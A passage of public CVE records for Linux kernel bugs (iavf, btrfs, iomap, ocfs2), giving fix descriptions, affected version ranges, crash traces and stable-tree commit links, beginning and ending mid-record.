"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.7"
},
{
"lessThan": "4.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "4.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\niavf: fix off-by-one issues in iavf_config_rss_reg()\n\nThere are off-by-one bugs when configuring RSS hash key and lookup\ntable, causing out-of-bounds reads to memory [1] and out-of-bounds\nwrites to device registers.\n\nBefore commit 43a3d9ba34c9 (\"i40evf: Allow PF driver to configure RSS\"),\nthe loop upper bounds were:\n i \u003c= I40E_VFQF_{HKEY,HLUT}_MAX_INDEX\nwhich is safe since the value is the last valid index.\n\nThat commit changed the bounds to:\n i \u003c= adapter-\u003erss_{key,lut}_size / 4\nwhere `rss_{key,lut}_size / 4` is the number of dwords, so the last\nvalid index is `(rss_{key,lut}_size / 4) - 1`. Therefore, using `\u003c=`\naccesses one element past the end.\n\nFix the issues by using `\u003c` instead of `\u003c=`, ensuring we do not exceed\nthe bounds.\n\n[1] KASAN splat about rss_key_size off-by-one\n BUG: KASAN: slab-out-of-bounds in iavf_config_rss+0x619/0x800\n Read of size 4 at addr ffff888102c50134 by task kworker/u8:6/63\n\n CPU: 0 UID: 0 PID: 63 Comm: kworker/u8:6 Not tainted 6.18.0-rc2-enjuk-tnguy-00378-g3005f5b77652-dirty #156 PREEMPT(voluntary)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n Workqueue: iavf iavf_watchdog_task\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xb0\n print_report+0x170/0x4f3\n kasan_report+0xe1/0x1a0\n iavf_config_rss+0x619/0x800\n iavf_watchdog_task+0x2be7/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\n Allocated by task 63:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7f/0x90\n __kmalloc_noprof+0x246/0x6f0\n iavf_watchdog_task+0x28fc/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n\n The buggy address belongs to 
the object at ffff888102c50100\n which belongs to the cache kmalloc-64 of size 64\n The buggy address is located 0 bytes to the right of\n allocated 52-byte region [ffff888102c50100, ffff888102c50134)\n\n The buggy address belongs to the physical page:\n page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x102c50\n flags: 0x200000000000000(node=0|zone=2)\n page_type: f5(slab)\n raw: 0200000000000000 ffff8881000418c0 dead000000000122 0000000000000000\n raw: 0000000000000000 0000000080200020 00000000f5000000 0000000000000000\n page dumped because: kasan: bad access detected\n\n Memory state around the buggy address:\n ffff888102c50000: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n ffff888102c50080: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n \u003effff888102c50100: 00 00 00 00 00 00 04 fc fc fc fc fc fc fc fc fc\n ^\n ffff888102c50180: 00 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc\n ffff888102c50200: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:51.272Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ceb8459df28d22c225a82d74c0f725f2a935d194"
},
{
"url": "https://git.kernel.org/stable/c/5bb18bfd505ca1affbca921462c350095a6c798c"
},
{
"url": "https://git.kernel.org/stable/c/d7369dc8dd7cbf5cee3a22610028d847b6f02982"
},
{
"url": "https://git.kernel.org/stable/c/18de0e41d69d97fab10b91fecf10ae78a5e43232"
},
{
"url": "https://git.kernel.org/stable/c/f36de3045d006e6d9be1be495f2ed88d1721e752"
},
{
"url": "https://git.kernel.org/stable/c/3095228e1320371e143835d0cebeef1a8a754c66"
},
{
"url": "https://git.kernel.org/stable/c/6daa2893f323981c7894c68440823326e93a7d61"
}
],
"title": "iavf: fix off-by-one issues in iavf_config_rss_reg()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71087",
"datePublished": "2026-01-13T15:34:49.691Z",
"dateReserved": "2026-01-13T15:30:19.649Z",
"dateUpdated": "2026-01-19T12:19:51.272Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68778 (GCVE-0-2025-68778)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-14 08:51
Title
btrfs: don't log conflicting inode if it's a dir moved in the current transaction
Summary
In the Linux kernel, the following vulnerability has been resolved:
btrfs: don't log conflicting inode if it's a dir moved in the current transaction
We can't log a conflicting inode if it's a directory and it was moved
from one parent directory to another parent directory in the current
transaction, as this can result in an attempt to have a directory with
two hard links during log replay, one for the old parent directory and
another for the new parent directory.
The following scenario triggers that issue:
1) We have directories "dir1" and "dir2" created in a past transaction.
Directory "dir1" has inode A as its parent directory;
2) We move "dir1" to some other directory;
3) We create a file with the name "dir1" in directory inode A;
4) We fsync the new file. This results in logging the inode of the new file
and the inode for the directory "dir1" that was previously moved in the
current transaction. So the log tree has the INODE_REF item for the
new location of "dir1";
5) We move the new file to some other directory. This results in updating
the log tree to include the new INODE_REF for the new location of the
file and removes the INODE_REF for the old location. This happens
during the rename when we call btrfs_log_new_name();
6) We fsync the file, and that persists the log tree changes done in the
previous step (btrfs_log_new_name() only updates the log tree in
memory);
7) We have a power failure;
8) Next time the fs is mounted, log replay happens and when processing
the inode for directory "dir1" we find a new INODE_REF and add that
link, but we don't remove the old link of the inode since we have
not logged the old parent directory of the directory inode "dir1".
As a result after log replay finishes when we trigger writeback of the
subvolume tree's extent buffers, the tree check will detect that we have
a directory with a hard link count of 2 and we get a mount failure.
The errors and stack traces reported in dmesg/syslog are like this:
[ 3845.729764] BTRFS info (device dm-0): start tree-log replay
[ 3845.730304] page: refcount:3 mapcount:0 mapping:000000005c8a3027 index:0x1d00 pfn:0x11510c
[ 3845.731236] memcg:ffff9264c02f4e00
[ 3845.731751] aops:btree_aops [btrfs] ino:1
[ 3845.732300] flags: 0x17fffc00000400a(uptodate|private|writeback|node=0|zone=2|lastcpupid=0x1ffff)
[ 3845.733346] raw: 017fffc00000400a 0000000000000000 dead000000000122 ffff9264d978aea8
[ 3845.734265] raw: 0000000000001d00 ffff92650e6d4738 00000003ffffffff ffff9264c02f4e00
[ 3845.735305] page dumped because: eb page dump
[ 3845.735981] BTRFS critical (device dm-0): corrupt leaf: root=5 block=30408704 slot=6 ino=257, invalid nlink: has 2 expect no more than 1 for dir
[ 3845.737786] BTRFS info (device dm-0): leaf 30408704 gen 10 total ptrs 17 free space 14881 owner 5
[ 3845.737789] BTRFS info (device dm-0): refs 4 lock_owner 0 current 30701
[ 3845.737792] item 0 key (256 INODE_ITEM 0) itemoff 16123 itemsize 160
[ 3845.737794] inode generation 3 transid 9 size 16 nbytes 16384
[ 3845.737795] block group 0 mode 40755 links 1 uid 0 gid 0
[ 3845.737797] rdev 0 sequence 2 flags 0x0
[ 3845.737798] atime 1764259517.0
[ 3845.737800] ctime 1764259517.572889464
[ 3845.737801] mtime 1764259517.572889464
[ 3845.737802] otime 1764259517.0
[ 3845.737803] item 1 key (256 INODE_REF 256) itemoff 16111 itemsize 12
[ 3845.737805] index 0 name_len 2
[ 3845.737807] item 2 key (256 DIR_ITEM 2363071922) itemoff 16077 itemsize 34
[ 3845.737808] location key (257 1 0) type 2
[ 3845.737810] transid 9 data_len 0 name_len 4
[ 3845.737811] item 3 key (256 DIR_ITEM 2676584006) itemoff 16043 itemsize 34
[ 3845.737813] location key (258 1 0) type 2
[ 3845.737814] transid 9 data_len 0 name_len 4
[ 3845.737815] item 4 key (256 DIR_INDEX 2) itemoff 16009 itemsize 34
[ 3845.737816] location key (257 1 0) type 2
[
---truncated---
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 44f714dae50a2e795d3268a6831762aa6fa54f55 , < d64f3834dffef80f0a9185a037617a54ed7f4bd2 (git) |
| Linux | Linux | Affected: 44f714dae50a2e795d3268a6831762aa6fa54f55 , < 7359e1d39c78816ecbdb0cb4e93975794ce53973 (git) |
| Linux | Linux | Affected: 44f714dae50a2e795d3268a6831762aa6fa54f55 , < d478f50727c3ee46d0359f0d2ae114f70191816e (git) |
| Linux | Linux | Affected: 44f714dae50a2e795d3268a6831762aa6fa54f55 , < a35788ddf8df65837897ecbb0ddb2896b863159e (git) |
| Linux | Linux | Affected: 44f714dae50a2e795d3268a6831762aa6fa54f55 , < 266273eaf4d99475f1ae57f687b3e42bc71ec6f0 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/btrfs/tree-log.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d64f3834dffef80f0a9185a037617a54ed7f4bd2",
"status": "affected",
"version": "44f714dae50a2e795d3268a6831762aa6fa54f55",
"versionType": "git"
},
{
"lessThan": "7359e1d39c78816ecbdb0cb4e93975794ce53973",
"status": "affected",
"version": "44f714dae50a2e795d3268a6831762aa6fa54f55",
"versionType": "git"
},
{
"lessThan": "d478f50727c3ee46d0359f0d2ae114f70191816e",
"status": "affected",
"version": "44f714dae50a2e795d3268a6831762aa6fa54f55",
"versionType": "git"
},
{
"lessThan": "a35788ddf8df65837897ecbb0ddb2896b863159e",
"status": "affected",
"version": "44f714dae50a2e795d3268a6831762aa6fa54f55",
"versionType": "git"
},
{
"lessThan": "266273eaf4d99475f1ae57f687b3e42bc71ec6f0",
"status": "affected",
"version": "44f714dae50a2e795d3268a6831762aa6fa54f55",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/btrfs/tree-log.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.8"
},
{
"lessThan": "4.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: don\u0027t log conflicting inode if it\u0027s a dir moved in the current transaction\n\nWe can\u0027t log a conflicting inode if it\u0027s a directory and it was moved\nfrom one parent directory to another parent directory in the current\ntransaction, as this can result an attempt to have a directory with\ntwo hard links during log replay, one for the old parent directory and\nanother for the new parent directory.\n\nThe following scenario triggers that issue:\n\n1) We have directories \"dir1\" and \"dir2\" created in a past transaction.\n Directory \"dir1\" has inode A as its parent directory;\n\n2) We move \"dir1\" to some other directory;\n\n3) We create a file with the name \"dir1\" in directory inode A;\n\n4) We fsync the new file. This results in logging the inode of the new file\n and the inode for the directory \"dir1\" that was previously moved in the\n current transaction. So the log tree has the INODE_REF item for the\n new location of \"dir1\";\n\n5) We move the new file to some other directory. This results in updating\n the log tree to included the new INODE_REF for the new location of the\n file and removes the INODE_REF for the old location. 
This happens\n during the rename when we call btrfs_log_new_name();\n\n6) We fsync the file, and that persists the log tree changes done in the\n previous step (btrfs_log_new_name() only updates the log tree in\n memory);\n\n7) We have a power failure;\n\n8) Next time the fs is mounted, log replay happens and when processing\n the inode for directory \"dir1\" we find a new INODE_REF and add that\n link, but we don\u0027t remove the old link of the inode since we have\n not logged the old parent directory of the directory inode \"dir1\".\n\nAs a result after log replay finishes when we trigger writeback of the\nsubvolume tree\u0027s extent buffers, the tree check will detect that we have\na directory a hard link count of 2 and we get a mount failure.\nThe errors and stack traces reported in dmesg/syslog are like this:\n\n [ 3845.729764] BTRFS info (device dm-0): start tree-log replay\n [ 3845.730304] page: refcount:3 mapcount:0 mapping:000000005c8a3027 index:0x1d00 pfn:0x11510c\n [ 3845.731236] memcg:ffff9264c02f4e00\n [ 3845.731751] aops:btree_aops [btrfs] ino:1\n [ 3845.732300] flags: 0x17fffc00000400a(uptodate|private|writeback|node=0|zone=2|lastcpupid=0x1ffff)\n [ 3845.733346] raw: 017fffc00000400a 0000000000000000 dead000000000122 ffff9264d978aea8\n [ 3845.734265] raw: 0000000000001d00 ffff92650e6d4738 00000003ffffffff ffff9264c02f4e00\n [ 3845.735305] page dumped because: eb page dump\n [ 3845.735981] BTRFS critical (device dm-0): corrupt leaf: root=5 block=30408704 slot=6 ino=257, invalid nlink: has 2 expect no more than 1 for dir\n [ 3845.737786] BTRFS info (device dm-0): leaf 30408704 gen 10 total ptrs 17 free space 14881 owner 5\n [ 3845.737789] BTRFS info (device dm-0): refs 4 lock_owner 0 current 30701\n [ 3845.737792] \titem 0 key (256 INODE_ITEM 0) itemoff 16123 itemsize 160\n [ 3845.737794] \t\tinode generation 3 transid 9 size 16 nbytes 16384\n [ 3845.737795] \t\tblock group 0 mode 40755 links 1 uid 0 gid 0\n [ 3845.737797] \t\trdev 0 sequence 2 
flags 0x0\n [ 3845.737798] \t\tatime 1764259517.0\n [ 3845.737800] \t\tctime 1764259517.572889464\n [ 3845.737801] \t\tmtime 1764259517.572889464\n [ 3845.737802] \t\totime 1764259517.0\n [ 3845.737803] \titem 1 key (256 INODE_REF 256) itemoff 16111 itemsize 12\n [ 3845.737805] \t\tindex 0 name_len 2\n [ 3845.737807] \titem 2 key (256 DIR_ITEM 2363071922) itemoff 16077 itemsize 34\n [ 3845.737808] \t\tlocation key (257 1 0) type 2\n [ 3845.737810] \t\ttransid 9 data_len 0 name_len 4\n [ 3845.737811] \titem 3 key (256 DIR_ITEM 2676584006) itemoff 16043 itemsize 34\n [ 3845.737813] \t\tlocation key (258 1 0) type 2\n [ 3845.737814] \t\ttransid 9 data_len 0 name_len 4\n [ 3845.737815] \titem 4 key (256 DIR_INDEX 2) itemoff 16009 itemsize 34\n [ 3845.737816] \t\tlocation key (257 1 0) type 2\n [\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-14T08:51:28.881Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d64f3834dffef80f0a9185a037617a54ed7f4bd2"
},
{
"url": "https://git.kernel.org/stable/c/7359e1d39c78816ecbdb0cb4e93975794ce53973"
},
{
"url": "https://git.kernel.org/stable/c/d478f50727c3ee46d0359f0d2ae114f70191816e"
},
{
"url": "https://git.kernel.org/stable/c/a35788ddf8df65837897ecbb0ddb2896b863159e"
},
{
"url": "https://git.kernel.org/stable/c/266273eaf4d99475f1ae57f687b3e42bc71ec6f0"
}
],
"title": "btrfs: don\u0027t log conflicting inode if it\u0027s a dir moved in the current transaction",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68778",
"datePublished": "2026-01-13T15:28:54.107Z",
"dateReserved": "2025-12-24T10:30:51.035Z",
"dateUpdated": "2026-01-14T08:51:28.881Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68794 (GCVE-0-2025-68794)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-14 08:51
Title
iomap: adjust read range correctly for non-block-aligned positions
Summary
In the Linux kernel, the following vulnerability has been resolved:
iomap: adjust read range correctly for non-block-aligned positions
iomap_adjust_read_range() assumes that the position and length passed in
are block-aligned. This is not always the case however, as shown in the
syzbot generated case for erofs. This causes too many bytes to be
skipped for uptodate blocks, which results in returning the incorrect
position and length to read in. If all the blocks are uptodate, this
underflows length and returns a position beyond the folio.
Fix the calculation to also take into account the block offset when
calculating how many bytes can be skipped for uptodate blocks.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 9dc55f1389f9569acf9659e58dd836a9c70df217 , < 82b60ffbb532d919959702768dca04c3c0500ae5 (git) |
| Linux | Linux | Affected: 9dc55f1389f9569acf9659e58dd836a9c70df217 , < 12053695c8ef5410e8cc6c9ed4c0db9cd9c82b3e (git) |
| Linux | Linux | Affected: 9dc55f1389f9569acf9659e58dd836a9c70df217 , < 142194fb21afe964d2d194cab1fc357cbf87e899 (git) |
| Linux | Linux | Affected: 9dc55f1389f9569acf9659e58dd836a9c70df217 , < 7aa6bc3e8766990824f66ca76c19596ce10daf3e (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/iomap/buffered-io.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "82b60ffbb532d919959702768dca04c3c0500ae5",
"status": "affected",
"version": "9dc55f1389f9569acf9659e58dd836a9c70df217",
"versionType": "git"
},
{
"lessThan": "12053695c8ef5410e8cc6c9ed4c0db9cd9c82b3e",
"status": "affected",
"version": "9dc55f1389f9569acf9659e58dd836a9c70df217",
"versionType": "git"
},
{
"lessThan": "142194fb21afe964d2d194cab1fc357cbf87e899",
"status": "affected",
"version": "9dc55f1389f9569acf9659e58dd836a9c70df217",
"versionType": "git"
},
{
"lessThan": "7aa6bc3e8766990824f66ca76c19596ce10daf3e",
"status": "affected",
"version": "9dc55f1389f9569acf9659e58dd836a9c70df217",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/iomap/buffered-io.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.19"
},
{
"lessThan": "4.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "4.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\niomap: adjust read range correctly for non-block-aligned positions\n\niomap_adjust_read_range() assumes that the position and length passed in\nare block-aligned. This is not always the case however, as shown in the\nsyzbot generated case for erofs. This causes too many bytes to be\nskipped for uptodate blocks, which results in returning the incorrect\nposition and length to read in. If all the blocks are uptodate, this\nunderflows length and returns a position beyond the folio.\n\nFix the calculation to also take into account the block offset when\ncalculating how many bytes can be skipped for uptodate blocks."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-14T08:51:34.049Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/82b60ffbb532d919959702768dca04c3c0500ae5"
},
{
"url": "https://git.kernel.org/stable/c/12053695c8ef5410e8cc6c9ed4c0db9cd9c82b3e"
},
{
"url": "https://git.kernel.org/stable/c/142194fb21afe964d2d194cab1fc357cbf87e899"
},
{
"url": "https://git.kernel.org/stable/c/7aa6bc3e8766990824f66ca76c19596ce10daf3e"
}
],
"title": "iomap: adjust read range correctly for non-block-aligned positions",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68794",
"datePublished": "2026-01-13T15:29:05.553Z",
"dateReserved": "2025-12-24T10:30:51.037Z",
"dateUpdated": "2026-01-14T08:51:34.049Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68771 (GCVE-0-2025-68771)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-19 12:18
Title
ocfs2: fix kernel BUG in ocfs2_find_victim_chain
Summary
In the Linux kernel, the following vulnerability has been resolved:
ocfs2: fix kernel BUG in ocfs2_find_victim_chain
syzbot reported a kernel BUG in ocfs2_find_victim_chain() because the
`cl_next_free_rec` field of the allocation chain list (next free slot in
the chain list) is 0, triggering the BUG_ON(!cl->cl_next_free_rec)
condition in ocfs2_find_victim_chain() and panicking the kernel.
To fix this, an if condition is introduced in ocfs2_claim_suballoc_bits(),
just before calling ocfs2_find_victim_chain(), the code block in it being
executed when either of the following conditions is true:
1. `cl_next_free_rec` is equal to 0, indicating that there are no free
chains in the allocation chain list
2. `cl_next_free_rec` is greater than `cl_count` (the total number of
chains in the allocation chain list)
Either of them being true is indicative of the fact that there are no
chains left for usage.
This is addressed using ocfs2_error(), which prints
the error log for debugging purposes, rather than panicking the kernel.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: ccd979bdbce9fba8412beb3f1de68a9d0171b12c , < 1f77e5cd563e6387fdf3bb714fcda36cd88ac5e7 (git) |
| Linux | Linux | Affected: ccd979bdbce9fba8412beb3f1de68a9d0171b12c , < d0fd1f732ea8063cecd07a3879b7d815c7ee71ed (git) |
| Linux | Linux | Affected: ccd979bdbce9fba8412beb3f1de68a9d0171b12c , < b08a33d5f80efe6979a6e8f905c1a898910c21dd (git) |
| Linux | Linux | Affected: ccd979bdbce9fba8412beb3f1de68a9d0171b12c , < 96f1b074c98c20f55a3b23d2ab44d9fb0f619869 (git) |
| Linux | Linux | Affected: ccd979bdbce9fba8412beb3f1de68a9d0171b12c , < e24aedae71652d4119049f1fbef6532ccbe3966d (git) |
| Linux | Linux | Affected: ccd979bdbce9fba8412beb3f1de68a9d0171b12c , < 7acc0390e0dd7474c4451d05465a677d55ad4268 (git) |
| Linux | Linux | Affected: ccd979bdbce9fba8412beb3f1de68a9d0171b12c , < 039bef30e320827bac8990c9f29d2a68cd8adb5f (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/ocfs2/suballoc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1f77e5cd563e6387fdf3bb714fcda36cd88ac5e7",
"status": "affected",
"version": "ccd979bdbce9fba8412beb3f1de68a9d0171b12c",
"versionType": "git"
},
{
"lessThan": "d0fd1f732ea8063cecd07a3879b7d815c7ee71ed",
"status": "affected",
"version": "ccd979bdbce9fba8412beb3f1de68a9d0171b12c",
"versionType": "git"
},
{
"lessThan": "b08a33d5f80efe6979a6e8f905c1a898910c21dd",
"status": "affected",
"version": "ccd979bdbce9fba8412beb3f1de68a9d0171b12c",
"versionType": "git"
},
{
"lessThan": "96f1b074c98c20f55a3b23d2ab44d9fb0f619869",
"status": "affected",
"version": "ccd979bdbce9fba8412beb3f1de68a9d0171b12c",
"versionType": "git"
},
{
"lessThan": "e24aedae71652d4119049f1fbef6532ccbe3966d",
"status": "affected",
"version": "ccd979bdbce9fba8412beb3f1de68a9d0171b12c",
"versionType": "git"
},
{
"lessThan": "7acc0390e0dd7474c4451d05465a677d55ad4268",
"status": "affected",
"version": "ccd979bdbce9fba8412beb3f1de68a9d0171b12c",
"versionType": "git"
},
{
"lessThan": "039bef30e320827bac8990c9f29d2a68cd8adb5f",
"status": "affected",
"version": "ccd979bdbce9fba8412beb3f1de68a9d0171b12c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/ocfs2/suballoc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.16"
},
{
"lessThan": "2.6.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
